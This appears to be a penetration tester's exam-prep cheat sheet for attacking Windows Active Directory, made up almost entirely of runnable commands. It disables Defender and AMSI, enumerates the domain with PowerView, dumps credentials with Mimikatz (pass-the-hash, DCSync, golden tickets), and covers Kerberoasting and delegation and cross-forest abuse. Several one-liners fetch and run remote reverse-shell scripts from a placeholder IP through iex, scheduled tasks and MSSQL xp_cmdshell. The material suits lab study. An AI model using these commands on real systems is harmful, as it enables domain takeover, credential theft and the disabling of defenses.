AMSI Bypass

<Redacted>
# your lab notes will have the latest one! 

Disable Defender

# need to be Local Admin
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -Disablerealtimemonitoring $true
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsilnitFailed','NonPublic,Static').SetValue($null,$true)"

Open Firewall Port

# need admin priv
New-NetFirewallRule -DisplayName 'HTTP-Inbound' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('80', '443')

Enumeration

Get-NetComputer | Get-NetShare # get all the shares in the domain  Use Get-DomainComputer on latest powerview script

Get-NetDomain # get info about current domain
Get-NetDomain -Domain forest.local # list info about a specific domain
Get-DomainSID # get domain sid 

(Get-DomainPolicy) 
(Get-DomainPolicy)."system access" # list password policy
(Get-DomainPolicy -domain domain.local)."system access" # password policy for any other domain

Get-NetDomainController # get domain controllers for the current domain

Get-NetUser# get list of users 
Get-NetUser -Username userX #list info about specific user
get-netuser | ?{$_.Name -match "userX"} # only for a specific user
Get-netuser | findstr "userX" # to only find a specific string everywhere
Get-NetUser | select -ExpandProperty samaccountname # used to expand a specific property just replace samaccountname with anything else to only list that property

Get-UserProperty # list properties of users in current domain
Get-UserProperty -Properties pwdlastset 
Get-UserProperty -Properties logoncount # used to find honeypot

Find-UserField -SearchField Description -SearchTerm "built" # find a specific string in users attribute

Get-NetComputer
Get-NetComputer -Operating System "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData

Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetGroup *admin* ## list all groups containing admin
Get-NetGroup "*Admins" -Domain domain.local | Get-NetGroupMember -Domain domain.local  # list all the groups members with admin in their group name

Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Enterprise Admins" # no output because not part of our local domain dc.domain.forest.local
Get-NetGroupMember -GroupName "*Admins" -Domain domain.local  # pritns only the schema and not the enterprise admins

Invoke-ShareFinder -verbose # list interesting shares 
Invoke-FileFinder -Verbose
Get-NetFileServer # get all file servers of the domain (hih priv servers only)

Get-NetGPO 
Get-NetGPO | select displayname # only list the GPOs 
Get-NetGPO -ComputerName userX.domain.forest.local
Get-NetGPOGroup

Find-GPOComputerAdmin -Computername nameX.local  
Find-GPOLocation -UserName userX -Verbose 

Get-NetOU
Get-NetOU -FullData
Get-NetOU -FullData | select name,gplink
(Get-NetOU StudentMachines -FullData).gplink  # print only the gplink complete
Get-NetOU Xmachines # print the ldap path
Get-NetOU XMachines | %{Get-NetComputer -ADSPath $_}  # print user belonging to one specific OU

Get-NetGPO -GPOname "{}" #gplink value inserted here

# <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces> must check this in exam
Get-ObjectAcl -SamAccountName userX -ResolveGUIDs -verbose
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs   # group based acl search
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose  # on the basis of prefix
Get-ObjectAcl -ADSpath "LDAP://CN=XXX,CN=XXX,DC=XXXX,DC=XXX,DC=local" -ResolveGuids -Verbose  # basis of ldap path
Get-ObjectAcl -SamAccountName userY -ResolveGUIDs -verbose | ?{$_.IdentityReference -match "groupX"} # ActiveDirectory Rights for groupX group on the users named userY
(Get-NetOU StudentMachines).gplink  | %{Get-NetGPO -ADSPath $_} # enumerate GPO applied on student machines OU 
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} # enumerate ACLs for ALL GPOs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "userX"}  #enumerate those GPOs where userX (can also use a group here) have interesting permissions
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "userX"} 

Invoke-ACLScanner -ResolveGUIDS # find interesting ACLs 

Get-PathAcl -Path "\\\\dc.domain.forest.local\\sysvol"

Get-NetDomainTrust
Get-NetDomainTrust -Domain domain.forest.local
Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} # just for domain trust mapping for external

Get-NetForestDomain -Verbose | Get-NetDomainTrust # map all the trusts of a forest
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} # list only external trusts of a forest 
Get-NetForestDomain -Forest forest.local -Verbose | Get-NetDomainTrust 

Get-NetForest
Get-NetForest -Forest forest.local

Get-NetForestDomain 
Get-NetForestDomain -Forest forest.local

Get-NetForestCatalog
Get-NetForestCatalog -Forest forest.local

Get-NetForestTrust
Get-NetForestTrust -Forest forest.local

Find-LocalAdminAccess -Verbose
Find-PSRemotingLocalAdminAccess # need to import Find-PSRemotingLocalAdminAccess.ps1 # super fast as compared to the above command 

Invoke-EnumerateLocalAdmin -verbose # find local admins, need admin on the current machine to run this

Invoke-UserHUnter -GroupName "groupX"

# use latest ingestor in exam, lab ingestor does not work properly
Invoke-Bloodhound -CollectionMethod All  
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose # not necessarily required but just for being sure, run this if sessions are missing
Invoke-Bloodhound -CollectionMethod All -ExcludeDC ## avoid detection like ATA
SharpHound.exe --CollectionMethod Session --Loop --Loopduration 03:09:41  # loop it to find all the sessions everywhere
MATCH (n:User), (m:Group {name: "DOMAIN [email protected]"}), p=shortestPath((n)-[*1..]->(m)) RETURN p  #shortest path to domain admins 
## use ou: gpo: computer, user group to enumerate on bloodhound

#forest search with bloodhound 
nltest /domain_trusts # find all the names
–domain #flag add to enumerate all the forests

Local PrivEsc

#service abuse
Invoke-ServiceAbuse -Name AbyssWebServer -Username "domain\\userX" -verbose

# unquoted path abuse
Write-ServiceBinary -Name 'servicename' -Path  C:\\WebServer\\service.exe -Username domain\\userX -Password XX # the password needs to be complex
##Logoff the server to see the changes 

Lateral Movement

powercat -l -v -p 443 -t 1000 #listener

Find-PSRemotingLocalAdminAccess 
Enter-PSSession -ComputerName nameX.domain.forest.local

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('<http://IP/tcprev.ps1>'));Power -Reverse -IPAddress IP -Port 443 # file loading in memory

Invoke-UserHunter -CheckAccess # after lateral movement pass powerview and run this
Invoke-Command -ScriptBlock{whoami} -ComputerName sv-nameX # if the session is allowed run it on that system to check if we have command execution

iex (New-Object Net.WebClient).Downloadstring('<http://IP/Find-PSRemotingLocalAdminAccess.ps1>')  # if the lower command does not work due to BOM Character
iex (iwr <http://IP/Invoke-Mimikatz.ps1> -UseBasicParsing) # load mimikatz in memory
$sess =New-PSSession -ComputerName sv-nameX.domain.forest.local # make a session in variable
# we cannot use Enter-PSSession over a reverse shell due to command redirection error, use New-PSSession along with Invoke-Command to perform Powershell Remoting
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess #disable av 
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess #run mimikatz as a function on the sv-nameX server

Invoke-Mimikatz -Command '"sekurlsa::pth /user:userX /domain:domain.forest.local /ntlm:"NTLM/rc4_value" /run:powershell.exe"' # pass the hash attack via mimikatz 
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' # dump krbtgt 
Invoke-Mimikatz -Command '"lsadump::dcsync /all"' # complete dcsync
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.forest.local /sid:<domain-sid-value> /krbtgt:ff46XX id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' #golden ticket

# Process using svcadmin as service account
Get-WmiObject "win32_service" -Filter "StartName='domain\\\\admin'"
Get-Process -IncludeUserName # does the same thing as above

# APPLOCKER STUFF
$ExecutionCOntext.SessionState.LanguageMode # check for constrained language mode
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections # to get details on app locker

# check for DCSync Replication rights on userX
Get-ObjectAcl -DistinguishedName "dc=domain,dc=forest,dc=com" -ResolveGUIDs | ? {($_.IdentityReference -match "userX") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

# keberoast 
Get-NetUser –SPN  #TGS tickets cannot be passed using PTT 
Request-SPNTicket "MSSQLSvc/sv-nameX.domain.forest.local"
Invoke-Mimikatz -Command '"kerberos::list /export"'
python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\2-40a10000-name1@MSSQLSvc~sv-name1.domain.forest.local-domain.forest.local.kirbi
# latest powerview 
Invoke-Kerberoast # dump the hash and crack with hashcat

# AS-Rep
Get-DomainUser -PreauthNotRequired -Verbose #pv_dev

#force AS-REP
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GroupX"} # find users where we have generic all/write rights
Set-DomainObject -Identity userZ -XOR @{useraccountcontrol=4194304} –Verbose # set there pre auth
Get-DomainUser -PreauthNotRequired -Verbose # now when we check we get those extra account as well 

# AS-REP roast module
Get-ASREPHash -UserName VPN1user -Verbose # get single user hash, and then crack it using Hashcat/John 
Invoke-ASREPRoast -Verbose # to find all the preauth tickets together  

# Targetted Kerberoasting
Set-DomainObject -Identity userZ -Set @{serviceprincipalname='ops/whatever1'} # set a user's SPN where we have generic all/write permission
# now we can locally brutefroce the password

# unconstrained delegation
Get-NetUser -Unconstrained
Get-NetComputer -Unconstrained #(follow objective 17)

# printer bug (objective 17)
Copy-Item -ToSession $appsrv1 -Path C:\\AD\\Tools\\Rubeus.exe -Destination C:\\Users\\admin\\Downloads 
.\\Rubeus.exe monitor /interval:5 /targetuser:dc$ /nowrap #run in the session
.\\MS-RPRN.exe \\\\dc.domain.forest.local \\\\sv-name1.domain.forest.local # run on any domain user
.\\Rubeus.exe ptt /ticket:<val> #run from the local, val=base64 ticket found

# Constrained delegation (objective 18)
Get-DomainUser -TrustedToAuth #HTTP (WinRM), LDAP (DCSync), HOST (PsExec shell, scheduled tasks), MSSQLSvc (DB admin rights), Host and RPCSS (WMI)
# Check objective 18 for in detail reverse shells 
# <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation>
 

Forest Level Attacks

# Child domain to forest root 
## using Trust key 
Get-DomainSID -Domain forest.local # to get the SIDs value + add 519
Get-DomainSID # get the SID value
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<Domain-SID> /sids:<Forest-SID>-519 /rc4:trust_key /service:krbtgt /target:forest.local /ticket:C:\\AD\\Tools\\trust_tkt.kirbi"'
Downloads\\Rubeus.exe asktgs /ticket:C:\\AD\\Tools\\trust_tkt.kirbi /service:cifs/dc.forest.local /dc:dc.forest.local /ptt
ls \\\\dc.forest.local\\c$

## using krbtgt 
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<Domain-SID> /sids:<Forest-SID>-519 /krbtgt:<krbtgt-hash> /ticket:C:\\AD\\Tools\\krbtgt_tkt.kirbi"' # to save the ticket
Invoke-Mimikatz -Command '"kerberos::ptt C:\\AD\\Tools\\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName dc.forest.local
### to get rev shell?
powercat -l -v -p 443 -t 1000 # get reverse shell 
schtasks /create /S dc.forest.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "task" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''<http://IP/Invoke-PowerShellTcp.ps1>''')'"
schtasks /Run /S dc.forest.local /TN "task" # to call the above task

# cross forest attacks
## inter-realm TGT 
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:domain.forest.local /sid:<domain-SID> /rc4:<trust_key_rc4> /service:krbtgt /target:cross_forest.local /ticket:C:\\AD\\Tools\\trust_forest_tkt.kirbi"'
.\\Rubeus.exe asktgs /ticket:C:\\AD\\Tools\\trust_forest_tkt.kirbi /service:cifs/cross-dc.cross-forest.local /dc:cross-dc.cross-forest.local /ptt
### now access the only allowed share
PS C:\\Users\\userX\\Desktop> Invoke-ShareFinder -Domain cross-forest.local -CheckShareAccess # to check accessible shares cross forest
ls \\\\cross-dc.cross-forest.local\\SharedwithCorp\\

MSSQL Abuse

## mssql 
Import-Module .\\PowerupSQL.ps1 #PowerUpSQL-master
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose # check accessibility 
### Manual crawling 
select * from master..sysservers
select * from openquery("DCORP-SQL1",'select * from master..sysservers') # run through dcorp-sql1
select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')') #run through dcorp-mgmt and so onn...
### Auto crawling
Get-SQLServerLinkCrawl -Instance dc-mssql.domain.forest.local -Verbose
### command execution
EXECUTE ('sp_configure "xp_cmdshell",1;reconfigure;') # to enable xp_cmdshell for command execution
Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query "exec master..xp_cmdshell 'whoami'"
Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''<http://IP/Invoke-PowerShellTcp.ps1>'')"' # reverse shell 

Misc

Command | ?{$_.param -match "Exact_keyword"} #replacement for grep <http://techgenix.com/dollar-sign-underscore-dot/>
(command).param  # works like the above command
Get-NetGroup "*Admins" -Domain forest.local | Get-NetGroupMember -Domain forest.local  # list all the groups members with admin in their group name
-ResolveGUIDs flag #indicates that any target GUIDs in the ACEs should be resolved to their human-readable names. <not a command>
move-item Powerview.ps1 Powerview.psm1 # this provides with the functions and cmdlets present in Powerview, which was otherwise not available
Convert-SidToName 'SID-value' # to check the username

# port issue?
netstat -ano | findstr :<PORT>
taskkill /PID <PID> /F

# download a file on disk 
Invoke-WebRequest -Uri "<http://IP/file.ps1>" -OutFile "file.ps1"